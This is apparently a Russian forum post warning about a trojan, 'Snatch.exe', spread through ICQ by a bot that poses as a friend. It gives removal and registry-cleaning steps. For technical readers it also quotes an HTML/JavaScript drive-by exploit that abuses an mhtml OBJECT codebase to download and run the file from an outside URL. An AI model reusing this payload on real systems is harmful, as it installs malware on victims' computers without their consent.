Сегодня с ночи по России стартовал троян, передаётся файлом "Snatch.exe" через аську, от имени вашего знакомого вам предлагают принят файл, на вопрос "Что это" - знакомый отвечает мол игруха. При скачке вирусняк прописывается в реестр и долбит с вашей аськи такие же письма. Метод борьбы, коль уже скачали:
1. Удаляем все месенджеры (Аськи QIP и т.п.)
2. Удаляете файл "Snatch.exe" с компа
3. Чистите реестр (если не знаете как - напишу)
4. Прогоняете комп антивирусом
5. перезагружаетесь, ставите аську и меняете пароль.
Для разбирающихся код вируса:
Уязвимость позволяет злоумышлинику закачивать и запускать файл.
Цитата
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script>
WaitForDocumentCached_TIME=100;
function LaunchRemoteExe_Step2()
{
//One more fresh action is present for more stable performance
for(i=1;i<=2;i++)
w.document.execCommand("Refresh");
}
function LaunchRemoteExe(ExeUrl)
{
w=window.open("about:blank","_blank","width=300 height=400 resizable=yes location=yes");
w.document.write("<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111113' CODEBASE='mhtml:file://Csnatch.exe!" + ExeUrl + "'> ,e");
setTimeout("LaunchRemoteExe_Step2()",WaitForDocume ntCached_TIME);
}
alert("This demo tries to download and runnhttp://www.bcdown.by.ru/snatch.exe");
LaunchRemoteExe("http://www.bcdown.by.ru/snatch.exe")
</script>
</head>
<body>
<font size="6"><font size="2"><big><big><big><big>ПОдождите пожалуста .....</big></big></big></big><b><i><br>
<br>
ПОдождите пожалуста .....
</i></b></font></font>
</body>
</html>
Ааа.. Забыл сказать, вирусняк рассылается ботом (роботом), и отвечает определённым текстом на определённые вопросы.
Например:
Вы: А что это за программа? (или типа того)
Типо Ваш друг: эта игрушка классная
Вы не могу скачать/установить/принять файл (или типа того)
Типо Ваш друг: залезь туда-то-туда-то и поставь там галочку.
И т.п.
P.S. Аськой сам не пользуюсь уже пару лет... Надоело, пользуюсь GTalk (общалка внутри googleвской почты Gmail.com)
На заметку, как очистить реестр:
1. Кликаем "Пуск"
2. На Win 95-XP кликаем "Выполнить" и вводим regedit, на win Vista-Win 7 в строке поиска вводим regedit и кликаем Enter
3. Нажимаем "Правка", затем "Найти" и в строке поиска ничего не меняя вводим "snatch" и кликаем "Enter"
4. Ждём поиска и кликаем ПКМ по папке "Snatch" зажав клавишу "Shift" кликаем "Удалить", на предупреждение отвечаем согласием.
5. Перезагружаем комп.
ВНИМАНИЕ!!! если вы не разбираетесь в реестре, то удалите только эту папку и больше ничего не трогайте и не изменяйте, малейшие изменения в реестре могут повлечь за собой сбой работы всего компа.
ут тема какая, сидишь ты, болтаешь по Аське с другом, болтаете-болтает и тут он Вам файл кидает, многие даже не заподозрят ничего. Он в основном и рассчитан на людей не особо разбирающихся.
P.S. Помимо засера Аськи он ещё открывает доступ к серъёзным вирусным файлам. Проблема в том, что я потестив этот троян обнаружил, что про него ничего не знает ни Каспер, ни Nod32, ни Norton IS. Он свеженький, само собой при ближайшем обновлении антивирусов они начнут сами с ним бороться.